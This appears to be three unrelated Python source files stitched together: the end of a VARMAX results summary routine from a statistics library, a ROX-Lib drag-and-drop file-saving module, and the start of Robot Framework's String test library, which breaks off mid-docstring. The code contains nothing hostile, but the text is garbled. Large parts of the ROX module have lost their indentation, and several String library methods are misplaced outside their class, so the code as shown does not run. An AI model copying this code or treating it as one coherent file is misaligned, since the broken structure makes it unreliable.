            order = '(%s)' % (spec.k_ar)
        else:
            model_name = 'VMA'
            order = '(%s)' % (spec.k_ma)
        if spec.k_exog > 0:
            model_name += 'X'
        model_name = [model_name + order]

        if spec.trend == 'c':
            model_name.append('intercept')

        if spec.measurement_error:
            model_name.append('measurement error')

        summary = super(VARMAXResults, self).summary(
            alpha=alpha, start=start, model_name=model_name,
            display_params=not separate_params
        )

        if separate_params:
            indices = np.arange(len(self.params))

            # Builds one coefficient table for the given boolean/index mask.
            # `self` is passed explicitly (this is a plain nested function,
            # not a method).
            def make_table(self, mask, title, strip_end=True):
                res = (self, self.params[mask], self.bse[mask],
                       self.zvalues[mask], self.pvalues[mask],
                       self.conf_int(alpha)[mask])

                param_names = [
                    '.'.join(name.split('.')[:-1]) if strip_end else name
                    for name in
                    np.array(self.data.param_names)[mask].tolist()
                ]

                return summary_params(res, yname=None, xname=param_names,
                                      alpha=alpha, use_t=False, title=title)

            # Add parameter tables for each endogenous variable
            k_endog = self.model.k_endog
            k_ar = self.model.k_ar
            k_ma = self.model.k_ma
            k_exog = self.model.k_exog
            endog_masks = []
            for i in range(k_endog):
                masks = []
                offset = 0

                # 1. Intercept terms
                if self.model.trend == 'c':
                    masks.append(np.array(i, ndmin=1))
                    offset += k_endog

                # 2. AR terms
                if k_ar > 0:
                    start = i * k_endog * k_ar
                    end = (i + 1) * k_endog * k_ar
                    masks.append(
                        offset + np.arange(start, end))
                    offset += k_ar * k_endog**2

                # 3. MA terms
                if k_ma > 0:
                    start = i * k_endog * k_ma
                    end = (i + 1) * k_endog * k_ma
                    masks.append(
                        offset + np.arange(start, end))
                    offset += k_ma * k_endog**2

                # 4. Regression terms
                if k_exog > 0:
                    masks.append(
                        offset + np.arange(i * k_exog, (i + 1) * k_exog))
                    offset += k_endog * k_exog

                # 5. Measurement error variance terms
                # NOTE(review): `k_params - i - 1` walks the trailing
                # measurement-variance block in reverse, so equation i is
                # paired with the variance of equation k_endog-1-i when
                # k_endog > 1 -- confirm this is intended.
                if self.model.measurement_error:
                    masks.append(np.array(self.model.k_params - i - 1, ndmin=1))

                # Create the table
                mask = np.concatenate(masks)
                endog_masks.append(mask)

                title = "Results for equation %s" % self.model.endog_names[i]
                table = make_table(self, mask, title)
                summary.tables.append(table)

            # State covariance terms
            state_cov_mask = (
                np.arange(len(self.params))[self.model._params_state_cov])
            table = make_table(self, state_cov_mask, "Error covariance matrix",
                               strip_end=False)
            summary.tables.append(table)

            # Add a table for all other parameters
            masks = []
            for m in (endog_masks, [state_cov_mask]):
                m = np.array(m).flatten()
                if len(m) > 0:
                    masks.append(m)
            masks = np.concatenate(masks)

            inverse_mask = np.array(list(set(indices).difference(set(masks))))
            if len(inverse_mask) > 0:
                table = make_table(self, inverse_mask, "Other parameters",
                                   strip_end=False)
                summary.tables.append(table)

        return summary
    summary.__doc__ = MLEResults.summary.__doc__
class VARMAXResultsWrapper(MLEResultsWrapper):
    # No VARMAX-specific attributes or methods need wrapping beyond what
    # MLEResultsWrapper already provides.
    _attrs = {}
    _wrap_attrs = wrap.union_dicts(MLEResultsWrapper._wrap_attrs,
                                   _attrs)
    _methods = {}
    _wrap_methods = wrap.union_dicts(MLEResultsWrapper._wrap_methods,
                                     _methods)
wrap.populate_wrapper(VARMAXResultsWrapper, VARMAXResults)
| |
"""All ROX applications that can save documents should use drag-and-drop saving.
The document itself should use the Saveable mix-in class and override some of the
methods to actually do the save.
If you want to save a selection then you can create a new object specially for
the purpose and pass that to the SaveBox."""
import os, sys
import rox
from rox import alert, info, g, _, filer, escape
from rox import choices, get_local_path
# Convenience alias for the GDK module.
gdk = g.gdk

# Drag-data target type codes (presumably XDS direct-save vs. raw data
# transfer -- confirm against the drag-source setup later in this file).
TARGET_XDS = 0
TARGET_RAW = 1
def _write_xds_property(context, value):
    """Set the XdndDirectSave0 property on the drag source window to `value`
    (as text/plain), or delete the property when `value` is empty/None."""
    source = context.source_window
    if not value:
        source.property_delete('XdndDirectSave0')
        return
    source.property_change('XdndDirectSave0', 'text/plain', 8,
                           gdk.PROP_MODE_REPLACE, value)
def _read_xds_property(context, delete):
    """Return the XdndDirectSave0 property of the drag source window, or
    None if it is not set. If `delete` is true, remove the property too."""
    prop = context.source_window.property_get('XdndDirectSave0',
                                              'text/plain', delete)
    return prop[2] if prop else None
def image_for_type(type):
'Search <Choices> for a suitable icon. Returns a pixbuf, or None.'
from icon_theme import rox_theme
media, subtype = type.split('/', 1)
path = choices.load('MIME-icons', media + '_' + subtype + '.png')
if not path:
icon = 'mime-%s:%s' % (media, subtype)
try:
path = rox_theme.lookup_icon(icon, 48)
if not path:
icon = 'mime-%s' % media
path = rox_theme.lookup_icon(icon, 48)
except:
print "Error loading MIME icon"
if not path:
path = choices.load('MIME-icons', media + '.png')
if path:
return gdk.pixbuf_new_from_file(path)
else:
return None
def _report_save_error():
    "Report a SaveAbort nicely, otherwise use report_exception()"
    exc_value = sys.exc_info()[1]
    if isinstance(exc_value, AbortSave):
        exc_value.show()
    else:
        rox.report_exception()
class AbortSave(Exception):
    """Cancel an in-progress save.

    If a message is supplied it is shown in a plain alert box (not in the
    report_exception style). Pass None to display nothing -- use that when
    the error has already been reported to the user."""

    def __init__(self, message):
        self.message = message

    def show(self):
        if not self.message:
            return
        rox.alert(self.message)
class Saveable:
"""This class describes the interface that an object must provide
to work with the SaveBox/SaveArea widgets. Inherit from it if you
want to save. All methods can be overridden, but normally only
save_to_stream() needs to be. You can also set save_last_stat to
the result of os.stat(filename) when loading a file to make ROX-Lib
restore permissions and warn about other programs editing the file."""
save_last_stat = None
def set_uri(self, uri):
"""When the data is safely saved somewhere this is called
with its new name. Mark your data as unmodified and update
the filename for next time. Saving to another application
won't call this method. Default method does nothing."""
pass
def save_to_stream(self, stream):
"""Write the data to save to the stream. When saving to a
local file, stream will be the actual file, otherwise it is a
cStringIO object."""
raise Exception('You forgot to write the save_to_stream() method...'
'silly programmer!')
def save_to_file(self, path):
"""Write data to file. Raise an exception on error.
The default creates a temporary file, uses save_to_stream() to
write to it, then renames it over the original. If the temporary file
can't be created, it writes directly over the original."""
# Ensure the directory exists...
dir = os.path.dirname(path)
if not os.path.isdir(dir):
from rox import fileutils
try:
fileutils.makedirs(dir)
except OSError:
raise AbortSave(None) # (message already shown)
import random
tmp = 'tmp-' + `random.randrange(1000000)`
tmp = os.path.join(dir, tmp)
def open(path):
return os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0600), 'wb')
try:
file = open(tmp)
except:
# Can't create backup... try a direct write
tmp = None
file = open(path)
try:
try:
self.save_to_stream(file)
finally:
file.close()
if tmp:
os.rename(tmp, path)
except:
_report_save_error()
if tmp and os.path.exists(tmp):
if os.path.getsize(tmp) == 0 or \
rox.confirm(_("Delete temporary file '%s'?") % tmp,
g.STOCK_DELETE):
os.unlink(tmp)
raise AbortSave(None)
self.save_set_permissions(path)
filer.examine(path)
def save_to_selection(self, selection_data):
"""Write data to the selection. The default method uses save_to_stream()."""
from cStringIO import StringIO
stream = StringIO()
self.save_to_stream(stream)
selection_data.set(selection_data.target, 8, stream.getvalue())
save_mode = None # For backwards compat
def save_set_permissions(self, path):
"""The default save_to_file() creates files with the mode 0600
(user read/write only). After saving has finished, it calls this
method to set the final permissions. The save_set_permissions():
- sets it to 0666 masked with the umask (if save_mode is None), or
- sets it to save_last_stat.st_mode (not masked) otherwise."""
if self.save_last_stat is not None:
save_mode = self.save_last_stat.st_mode
else:
save_mode = self.save_mode
if save_mode is not None:
os.chmod(path, save_mode)
else:
mask = os.umask(0077) # Get the current umask
os.umask(mask) # Set it back how it was
os.chmod(path, 0666 & ~mask)
def save_done(self):
"""Time to close the savebox. Default method does nothing."""
pass
def discard(self):
"""Discard button clicked, or document safely saved. Only called if a SaveBox
was created with discard=1.
The user doesn't want the document any more, even if it's modified and unsaved.
Delete it."""
raise Exception("Sorry... my programmer forgot to tell me how to handle Discard!")
save_to_stream._rox_default = 1
save_to_file._rox_default = 1
save_to_selection._rox_default = 1
def can_save_to_file(self):
"""Indicates whether we have a working save_to_stream or save_to_file
method (ie, whether we can save to files). Default method checks that
one of these two methods has been overridden."""
if not hasattr(self.save_to_stream, '_rox_default'):
return 1 # Have user-provided save_to_stream
if not hasattr(self.save_to_file, '_rox_default'):
return 1 # Have user-provided save_to_file
return 0
def can_save_to_selection(self):
    """Indicates whether we have a working save_to_stream or save_to_selection
    method (ie, whether we can save to selections). Default methods checks that
    one of these two methods has been overridden."""
    for method in (self.save_to_stream, self.save_to_selection):
        if not hasattr(method, '_rox_default'):
            return 1	# Have a user-provided implementation
    return 0
def save_cancelled(self):
    """If you multitask during a save (using a recursive mainloop) then the
    user may click on the Cancel button. This function gets called if so, and
    should cause the recursive mainloop to return."""
    # Only needs overriding when a save_to_* method runs a recursive mainloop.
    raise Exception("Lazy programmer error: can't abort save!")
class SaveArea(g.VBox):
    """A SaveArea contains the widgets used in a save box. You can use
    this to put a savebox area in a larger window."""

    def __init__(self, document, uri, type):
        """'document' must be a subclass of Saveable.
        'uri' is the file's current location, or a simple name (eg 'TextFile')
        if it has never been saved.
        'type' is the MIME-type to use (eg 'text/plain').
        """
        g.VBox.__init__(self, False, 0)
        self.document = document
        self.initial_uri = uri
        # Top half: the draggable icon.
        drag_area = self._create_drag_area(type)
        self.pack_start(drag_area, True, True, 0)
        drag_area.show_all()
        # Bottom half: the pathname entry; Return acts like clicking OK.
        entry = g.Entry()
        entry.connect('activate', lambda w: self.save_to_file_in_entry())
        self.entry = entry
        self.pack_start(entry, False, True, 4)
        entry.show()
        entry.set_text(uri)

    def _set_icon(self, type):
        # Show the icon for MIME type 'type', falling back to the stock
        # "missing image" icon. Internal.
        pixbuf = image_for_type(type)
        if pixbuf:
            self.icon.set_from_pixbuf(pixbuf)
        else:
            self.icon.set_from_stock(g.STOCK_MISSING_IMAGE, g.ICON_SIZE_DND)

    def _create_drag_area(self, type):
        # Build the EventBox + Image used as the drag source and hook up
        # the drag signals. Returns the widget to pack. Internal.
        align = g.Alignment()
        align.set(.5, .5, 0, 0)
        self.drag_box = g.EventBox()
        self.drag_box.set_border_width(4)
        self.drag_box.add_events(gdk.BUTTON_PRESS_MASK)
        align.add(self.drag_box)
        self.icon = g.Image()
        self._set_icon(type)
        self._set_drag_source(type)
        self.drag_box.connect('drag_begin', self.drag_begin)
        self.drag_box.connect('drag_end', self.drag_end)
        self.drag_box.connect('drag_data_get', self.drag_data_get)
        self.drag_in_progress = 0
        self.drag_box.add(self.icon)
        return align

    def set_type(self, type, icon = None):
        """Change the icon and drag target to 'type'.
        If 'icon' is given (as a GtkImage) then that icon is used,
        otherwise an appropriate icon for the type is used."""
        if icon:
            self.icon.set_from_pixbuf(icon.get_pixbuf())
        else:
            self._set_icon(type)
        self._set_drag_source(type)

    def _set_drag_source(self, type):
        # Advertise XDS only when we can save to a file, and raw data
        # targets only when we can save to a selection. Internal.
        if self.document.can_save_to_file():
            targets = [('XdndDirectSave0', 0, TARGET_XDS)]
        else:
            targets = []
        if self.document.can_save_to_selection():
            targets = targets + [(type, 0, TARGET_RAW),
                                 ('application/octet-stream', 0, TARGET_RAW)]
        if not targets:
            raise Exception("Document %s can't save!" % self.document)
        self.drag_box.drag_source_set(gdk.BUTTON1_MASK | gdk.BUTTON3_MASK,
                                      targets,
                                      gdk.ACTION_COPY | gdk.ACTION_MOVE)

    def save_to_file_in_entry(self):
        """Call this when the user clicks on an OK button you provide."""
        uri = self.entry.get_text()
        path = get_local_path(escape(uri))
        if path:
            if not self.confirm_new_path(path):
                return
            try:
                # Shade the area while the (possibly slow) save runs.
                self.set_sensitive(False)
                try:
                    self.document.save_to_file(path)
                finally:
                    self.set_sensitive(True)
                self.set_uri(path)
                self.save_done()
            except:
                _report_save_error()
        else:
            rox.info(_("Drag the icon to a directory viewer\n"
                       "(or enter a full pathname)"))

    def drag_begin(self, drag_box, context):
        # A drag has started: reset per-drag state, set the drag icon and
        # advertise the leafname via the XdndDirectSave0 property. Internal.
        self.drag_in_progress = 1
        self.destroy_on_drag_end = 0
        self.using_xds = 0
        self.data_sent = 0
        try:
            pixbuf = self.icon.get_pixbuf()
            if pixbuf:
                drag_box.drag_source_set_icon_pixbuf(pixbuf)
        except:
            # This can happen if we set the broken image...
            import traceback
            traceback.print_exc()
        uri = self.entry.get_text()
        if uri:
            i = uri.rfind('/')
            if (i == -1):
                leaf = uri
            else:
                leaf = uri[i + 1:]
        else:
            leaf = _('Unnamed')
        _write_xds_property(context, leaf)

    def drag_data_get(self, widget, context, selection_data, info, time):
        # The drop target asked for the data: either send the document
        # directly (TARGET_RAW) or perform an X Direct Save (TARGET_XDS).
        # Internal.
        if info == TARGET_RAW:
            try:
                self.set_sensitive(False)
                try:
                    self.document.save_to_selection(selection_data)
                finally:
                    self.set_sensitive(True)
            except:
                _report_save_error()
                _write_xds_property(context, None)
                return
            self.data_sent = 1
            _write_xds_property(context, None)
            if self.drag_in_progress:
                self.destroy_on_drag_end = 1
            else:
                self.save_done()
            return
        elif info != TARGET_XDS:
            _write_xds_property(context, None)
            alert("Bad target requested!")
            return
        # Using XDS:
        #
        # Get the path that the destination app wants us to save to.
        # If it's local, save and return Success
        #   (or Error if save fails)
        # If it's remote, return Failure (remote may try another method)
        # If no URI is given, return Error
        to_send = 'E'
        uri = _read_xds_property(context, False)
        if uri:
            path = get_local_path(uri)
            if path:
                if not self.confirm_new_path(path):
                    to_send = 'E'
                else:
                    try:
                        self.set_sensitive(False)
                        try:
                            self.document.save_to_file(path)
                        finally:
                            self.set_sensitive(True)
                        self.data_sent = True
                    except:
                        _report_save_error()
                        self.data_sent = False
                    if self.data_sent:
                        to_send = 'S'
                # (else Error)
            else:
                to_send = 'F'	# Non-local transfer
        else:
            alert("Remote application wants to use " +
                  "Direct Save, but I can't read the " +
                  "XdndDirectSave0 (type text/plain) " +
                  "property.")
        selection_data.set(selection_data.target, 8, to_send)
        if to_send != 'E':
            # Tidy up the XDS property and record the new location.
            _write_xds_property(context, None)
            path = get_local_path(uri)
            if path:
                self.set_uri(path)
            else:
                self.set_uri(uri)
        if self.data_sent:
            self.save_done()

    def confirm_new_path(self, path):
        """User wants to save to this path. If it's different to the original path,
        check that it doesn't exist and ask for confirmation if it does.
        If document.save_last_stat is set, compare with os.stat for an existing file
        and warn about changes.
        Returns true to go ahead with the save."""
        if not os.path.exists(path):
            return True
        if path == self.initial_uri:
            if self.document.save_last_stat is None:
                return True	# OK. Nothing to compare with.
            last = self.document.save_last_stat
            stat = os.stat(path)
            msg = []
            if stat.st_mode != last.st_mode:
                msg.append(_("Permissions changed from %o to %o.") % \
                    (last.st_mode, stat.st_mode))
            if stat.st_size != last.st_size:
                msg.append(_("Size was %d bytes; now %d bytes.") % \
                    (last.st_size, stat.st_size))
            if stat.st_mtime != last.st_mtime:
                msg.append(_("Modification time changed."))
            if not msg:
                return True	# No change detected
            # NOTE(review): this message is not wrapped in _() unlike the
            # other user-visible strings here — confirm whether intended.
            return rox.confirm("File '%s' edited by another program since last load/save. "
                    "Really save (discarding other changes)?\n\n%s" %
                    (path, '\n'.join(msg)), g.STOCK_DELETE)
        return rox.confirm(_("File '%s' already exists -- overwrite it?") % path,
                g.STOCK_DELETE, _('_Overwrite'))

    def set_uri(self, uri):
        """Data is safely saved somewhere. Update the document's URI and save_last_stat (for local saves).
        Internal."""
        path = get_local_path(uri)
        if path is not None:
            self.document.save_last_stat = os.stat(path)	# Record for next time
        self.document.set_uri(uri)

    def drag_end(self, widget, context):
        # Drag finished; if the data was already sent, finish up now. Internal.
        self.drag_in_progress = 0
        if self.destroy_on_drag_end:
            self.save_done()

    def save_done(self):
        # Forward completion to the document. Internal.
        self.document.save_done()
class SaveBox(g.Dialog):
    """A SaveBox is a GtkDialog that contains a SaveArea and, optionally, a Discard button.
    Calls rox.toplevel_(un)ref automatically.
    """
    def __init__(self, document, uri, type = 'text/plain', discard = False):
        """See SaveArea.__init__.
        If discard is True then an extra discard button is added to the dialog."""
        g.Dialog.__init__(self)
        self.set_has_separator(False)
        self.add_button(g.STOCK_CANCEL, g.RESPONSE_CANCEL)
        self.add_button(g.STOCK_SAVE, g.RESPONSE_OK)
        self.set_default_response(g.RESPONSE_OK)
        if discard:
            # Optional Discard button packed above the main area.
            discard_area = g.HButtonBox()
            def discard_clicked(event):
                document.discard()
                self.destroy()
            button = rox.ButtonMixed(g.STOCK_DELETE, _('_Discard'))
            discard_area.pack_start(button, False, True, 2)
            button.connect('clicked', discard_clicked)
            button.unset_flags(g.CAN_FOCUS)
            button.set_flags(g.CAN_DEFAULT)
            self.vbox.pack_end(discard_area, False, True, 0)
            self.vbox.reorder_child(discard_area, 0)
            discard_area.show_all()
        self.set_title(_('Save As:'))
        self.set_position(g.WIN_POS_MOUSE)
        self.set_wmclass('savebox', 'Savebox')
        self.set_border_width(1)
        # Might as well make use of the new nested scopes ;-)
        self.set_save_in_progress(0)
        # Local subclass that closes/updates this dialog as the save
        # progresses (closes over 'self', 'document' and 'discard').
        class BoxedArea(SaveArea):
            def set_uri(area, uri):
                SaveArea.set_uri(area, uri)
                if discard:
                    document.discard()
            def save_done(area):
                document.save_done()
                self.destroy()
            def set_sensitive(area, sensitive):
                if self.window:
                    # Might have been destroyed by now...
                    self.set_save_in_progress(not sensitive)
                SaveArea.set_sensitive(area, sensitive)
        save_area = BoxedArea(document, uri, type)
        self.save_area = save_area
        save_area.show_all()
        self.build_main_area()
        # Select only the leafname part of the suggested pathname.
        i = uri.rfind('/')
        i = i + 1
        # Have to do this here, or the selection gets messed up
        save_area.entry.grab_focus()
        g.Editable.select_region(save_area.entry, i, -1) # PyGtk bug
        #save_area.entry.select_region(i, -1)
        def got_response(widget, response):
            if self.save_in_progress:
                # A click during a save means "cancel the save".
                try:
                    document.save_cancelled()
                except:
                    rox.report_exception()
                return
            if response == g.RESPONSE_CANCEL:
                self.destroy()
            elif response == g.RESPONSE_OK:
                self.save_area.save_to_file_in_entry()
            elif response == g.RESPONSE_DELETE_EVENT:
                pass
            else:
                raise Exception('Unknown response!')
        self.connect('response', got_response)
        rox.toplevel_ref()
        self.connect('destroy', lambda w: rox.toplevel_unref())

    def set_type(self, type, icon = None):
        """See SaveArea's method of the same name."""
        self.save_area.set_type(type, icon)

    def build_main_area(self):
        """Place self.save_area somewhere in self.vbox. Override this
        for more complicated layouts."""
        self.vbox.add(self.save_area)

    def set_save_in_progress(self, in_progress):
        """Called when saving starts and ends. Shade/unshade any widgets as
        required. Make sure you call the default method too!
        Not called if box is destroyed from a recursive mainloop inside
        a save_to_* function."""
        self.set_response_sensitive(g.RESPONSE_OK, not in_progress)
        self.save_in_progress = in_progress
class StringSaver(SaveBox, Saveable):
    """A trivial SaveBox whose document is the fixed string passed to
    its constructor (the instance acts as its own Saveable)."""

    def __init__(self, string, name):
        """'string' is the string to save. 'name' is the default filename"""
        # We are both the dialog and the document being saved.
        SaveBox.__init__(self, self, name, 'text/plain')
        self.string = string

    def save_to_stream(self, stream):
        # Write the stored text straight out.
        stream.write(self.string)
class SaveFilter(Saveable):
    """This Saveable runs a process in the background to generate the
    save data. Any python streams can be used as the input to and
    output from the process.
    The output from the subprocess is saved to the output stream (either
    directly, for fileno() streams, or via another temporary file).
    If the process returns a non-zero exit status or writes to stderr,
    the save fails (messages written to stderr are displayed).
    """
    stdin = None
    # The running PipeThroughCommand, or None when no save is in progress.
    # Fix: previously this attribute only existed after save_to_stream()
    # had started, so calling save_cancelled() before the first save
    # raised AttributeError instead of being a harmless no-op.
    process = None
    killed = 0

    def set_stdin(self, stream):
        """Use 'stream' as stdin for the process. If stream is not a
        seekable fileno() stream then it is copied to a temporary file
        at this point. If None, the child process will get /dev/null on
        stdin."""
        if stream is not None:
            if hasattr(stream, 'fileno') and hasattr(stream, 'seek'):
                self.stdin = stream
            else:
                import tempfile
                import shutil
                self.stdin = tempfile.TemporaryFile()
                # NOTE(review): the copy leaves the temp file positioned at
                # EOF — presumably PipeThroughCommand rewinds it; verify.
                shutil.copyfileobj(stream, self.stdin)
        else:
            self.stdin = None

    def save_to_stream(self, stream):
        """Run self.command (set by the subclass), feeding it self.stdin
        and writing its output to 'stream'. Blocks until it finishes."""
        from processes import PipeThroughCommand
        assert not hasattr(self, 'child_run')	# No longer supported
        self.process = PipeThroughCommand(self.command, self.stdin, stream)
        self.process.wait()
        self.process = None

    def save_cancelled(self):
        """Send SIGTERM to the child processes."""
        if self.process:
            self.killed = 1
            self.process.kill()
| |
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import re
from fnmatch import fnmatchcase
from random import randint
from string import ascii_lowercase, ascii_uppercase, digits
from robot.api import logger
from robot.utils import is_bytes, is_string, is_truthy, is_unicode, lower, unic
from robot.version import get_version
class String(object):
"""A test library for string manipulation and verification.
``String`` is Robot Framework's standard library for manipulating
strings (e.g. `Replace String Using Regexp`, `Split To Lines`) and
verifying their contents (e.g. `Should Be String`).
Following keywords from ``BuiltIn`` library can also be used with strings:
- `Catenate`
- `Get Length`
- `Length Should Be`
- `Should (Not) Be Empty`
- `Should (Not) Be Equal (As Strings/Integers/Numbers)`
- `Should (Not) Match (Regexp)`
- `Should (Not) Contain`
- `Should (Not) Start With`
- `Should (Not) End With`
- `Convert To String`
- `Convert To Bytes`
"""
ROBOT_LIBRARY_SCOPE = 'GLOBAL'
ROBOT_LIBRARY_VERSION = get_version()
def convert_to_lowercase(self, string):
    """Converts string to lowercase.
    Examples:
    | ${str1} = | Convert To Lowercase | ABC |
    | ${str2} = | Convert To Lowercase | 1A2c3D |
    | Should Be Equal | ${str1} | abc |
    | Should Be Equal | ${str2} | 1a2c3d |
    New in Robot Framework 2.8.6.
    """
    # Custom `lower` (from robot.utils) needed due to IronPython bug.
    # See its code and comments for more details.
    return lower(string)
def convert_to_uppercase(self, string):
    """Converts the given string to uppercase.
    Examples:
    | ${str1} = | Convert To Uppercase | abc |
    | ${str2} = | Convert To Uppercase | 1a2C3d |
    | Should Be Equal | ${str1} | ABC |
    | Should Be Equal | ${str2} | 1A2C3D |
    New in Robot Framework 2.8.6.
    """
    # Plain str.upper works the same on all supported interpreters.
    return string.upper()
def encode_string_to_bytes(self, string, encoding, errors='strict'):
    """Encodes the given Unicode ``string`` to bytes using the given ``encoding``.
    ``errors`` argument controls what to do if encoding some characters fails.
    All values accepted by ``encode`` method in Python are valid, but in
    practice the following values are most useful:
    - ``strict``: fail if characters cannot be encoded (default)
    - ``ignore``: ignore characters that cannot be encoded
    - ``replace``: replace characters that cannot be encoded with
      a replacement character
    Examples:
    | ${bytes} = | Encode String To Bytes | ${string} | UTF-8 |
    | ${bytes} = | Encode String To Bytes | ${string} | ASCII | errors=ignore |
    Use `Convert To Bytes` in ``BuiltIn`` if you want to create bytes based
    on character or integer sequences. Use `Decode Bytes To String` if you
    need to convert byte strings to Unicode strings and `Convert To String`
    in ``BuiltIn`` if you need to convert arbitrary objects to Unicode.
    New in Robot Framework 2.7.7.
    """
    encoded = string.encode(encoding, errors)
    return encoded
def decode_bytes_to_string(self, bytes, encoding, errors='strict'):
    """Decodes the given ``bytes`` to a Unicode string using the given ``encoding``.
    ``errors`` argument controls what to do if decoding some bytes fails.
    All values accepted by ``decode`` method in Python are valid, but in
    practice the following values are most useful:
    - ``strict``: fail if characters cannot be decoded (default)
    - ``ignore``: ignore characters that cannot be decoded
    - ``replace``: replace characters that cannot be decoded with
      a replacement character
    Examples:
    | ${string} = | Decode Bytes To String | ${bytes} | UTF-8 |
    | ${string} = | Decode Bytes To String | ${bytes} | ASCII | errors=ignore |
    Use `Encode String To Bytes` if you need to convert Unicode strings to
    byte strings, and `Convert To String` in ``BuiltIn`` if you need to
    convert arbitrary objects to Unicode strings.
    New in Robot Framework 2.7.7.
    """
    decoded = bytes.decode(encoding, errors)
    return decoded
def get_line_count(self, string):
    """Returns and logs the number of lines in the given string."""
    lines = string.splitlines()
    logger.info('%d lines' % len(lines))
    return len(lines)
def split_to_lines(self, string, start=0, end=None):
    """Splits the given string to lines.
    It is possible to get only a selection of lines from ``start``
    to ``end`` so that ``start`` index is inclusive and ``end`` is
    exclusive. Line numbering starts from 0, and it is possible to
    use negative indices to refer to lines from the end.
    Lines are returned without the newlines. The number of
    returned lines is automatically logged.
    Examples:
    | @{lines} =        | Split To Lines | ${manylines} |    |    |
    | @{ignore first} = | Split To Lines | ${manylines} | 1  |    |
    | @{ignore last} =  | Split To Lines | ${manylines} |    | -1 |
    | @{5th to 10th} =  | Split To Lines | ${manylines} | 4  | 10 |
    | @{first two} =    | Split To Lines | ${manylines} |    | 1  |
    | @{last two} =     | Split To Lines | ${manylines} | -2 |    |
    Use `Get Line` if you only need to get a single line.
    """
    begin = self._convert_to_index(start, 'start')
    stop = self._convert_to_index(end, 'end')
    selected = string.splitlines()[begin:stop]
    logger.info('%d lines returned' % len(selected))
    return selected
def get_line(self, string, line_number):
    """Returns the specified line from the given ``string``.
    Line numbering starts from 0 and it is possible to use
    negative indices to refer to lines from the end. The line is
    returned without the newline character.
    Examples:
    | ${first} =    | Get Line | ${string} | 0  |
    | ${2nd last} = | Get Line | ${string} | -2 |
    Use `Split To Lines` if all lines are needed.
    """
    index = self._convert_to_integer(line_number, 'line_number')
    return string.splitlines()[index]
def get_lines_containing_string(self, string, pattern, case_insensitive=False):
    """Returns lines of the given ``string`` that contain the ``pattern``.
    The ``pattern`` is always considered to be a normal string, not a glob
    or regexp pattern. A line matches if the ``pattern`` is found anywhere
    on it.
    The match is case-sensitive by default, but giving ``case_insensitive``
    a true value makes it case-insensitive. The value is considered true
    if it is a non-empty string that is not equal to ``false`` or ``no``.
    If the value is not a string, its truth value is got directly in Python.
    Lines are returned as one string catenated back together with
    newlines. Possible trailing newline is never returned. The
    number of matching lines is automatically logged.
    Examples:
    | ${lines} = | Get Lines Containing String | ${result} | An example |
    | ${ret} =   | Get Lines Containing String | ${ret} | FAIL | case-insensitive |
    See `Get Lines Matching Pattern` and `Get Lines Matching Regexp`
    if you need more complex pattern matching.
    """
    if is_truthy(case_insensitive):
        needle = pattern.lower()
        match = lambda line: needle in line.lower()
    else:
        match = lambda line: pattern in line
    return self._get_matching_lines(string, match)
def get_lines_matching_pattern(self, string, pattern, case_insensitive=False):
    """Returns lines of the given ``string`` that match the ``pattern``.
    The ``pattern`` is a _glob pattern_ where:
    | ``*``        | matches everything |
    | ``?``        | matches any single character |
    | ``[chars]``  | matches any character inside square brackets (e.g. ``[abc]`` matches either ``a``, ``b`` or ``c``) |
    | ``[!chars]`` | matches any character not inside square brackets |
    A line matches only if it matches the ``pattern`` fully.
    The match is case-sensitive by default, but giving ``case_insensitive``
    a true value makes it case-insensitive. The value is considered true
    if it is a non-empty string that is not equal to ``false`` or ``no``.
    If the value is not a string, its truth value is got directly in Python.
    Lines are returned as one string catenated back together with
    newlines. Possible trailing newline is never returned. The
    number of matching lines is automatically logged.
    Examples:
    | ${lines} = | Get Lines Matching Pattern | ${result} | Wild???? example |
    | ${ret} =   | Get Lines Matching Pattern | ${ret} | FAIL: * | case_insensitive=true |
    See `Get Lines Matching Regexp` if you need more complex
    patterns and `Get Lines Containing String` if searching
    literal strings is enough.
    """
    if is_truthy(case_insensitive):
        glob = pattern.lower()
        match = lambda line: fnmatchcase(line.lower(), glob)
    else:
        match = lambda line: fnmatchcase(line, pattern)
    return self._get_matching_lines(string, match)
def get_lines_matching_regexp(self, string, pattern, partial_match=False):
    """Returns lines of the given ``string`` that match the regexp ``pattern``.
    See `BuiltIn.Should Match Regexp` for more information about
    Python regular expression syntax in general and how to use it
    in Robot Framework test data in particular.
    By default lines match only if they match the pattern fully, but
    partial matching can be enabled by giving the ``partial_match``
    argument a true value. The value is considered true if it is a
    non-empty string that is not equal to ``false`` or ``no``. If the
    value is not a string, its truth value is got directly in Python.
    If the pattern is empty, it matches only empty lines by default.
    When partial matching is enabled, empty pattern matches all lines.
    Notice that to make the match case-insensitive, you need to prefix
    the pattern with case-insensitive flag ``(?i)``.
    Lines are returned as one string concatenated back together with
    newlines. Possible trailing newline is never returned. The
    number of matching lines is automatically logged.
    Examples:
    | ${lines} = | Get Lines Matching Regexp | ${result} | Reg\\\\w{3} example |
    | ${lines} = | Get Lines Matching Regexp | ${result} | Reg\\\\w{3} example | partial_match=true |
    | ${ret} =   | Get Lines Matching Regexp | ${ret} | (?i)FAIL: .* |
    See `Get Lines Matching Pattern` and `Get Lines Containing
    String` if you do not need full regular expression powers (and
    complexity).
    ``partial_match`` argument is new in Robot Framework 2.9. In earlier
    versions exact match was always required.
    """
    if not is_truthy(partial_match):
        # Anchor the pattern so only full-line matches count.
        pattern = '^%s$' % pattern
    matcher = re.compile(pattern).search
    return self._get_matching_lines(string, matcher)
def _get_matching_lines(self, string, matches):
    # Filter the lines of `string` with the `matches` predicate, log the
    # hit ratio, and return the selected lines joined with newlines.
    all_lines = string.splitlines()
    selected = list(filter(matches, all_lines))
    logger.info('%d out of %d lines matched' % (len(selected), len(all_lines)))
    return '\n'.join(selected)
def get_regexp_matches(self, string, pattern, *groups):
    """Returns a list of all non-overlapping matches in the given string.
    ``string`` is the string to find matches from and ``pattern`` is the
    regular expression. See `BuiltIn.Should Match Regexp` for more
    information about Python regular expression syntax in general and how
    to use it in Robot Framework test data in particular.
    If no groups are used, the returned list contains full matches. If one
    group is used, the list contains only contents of that group. If
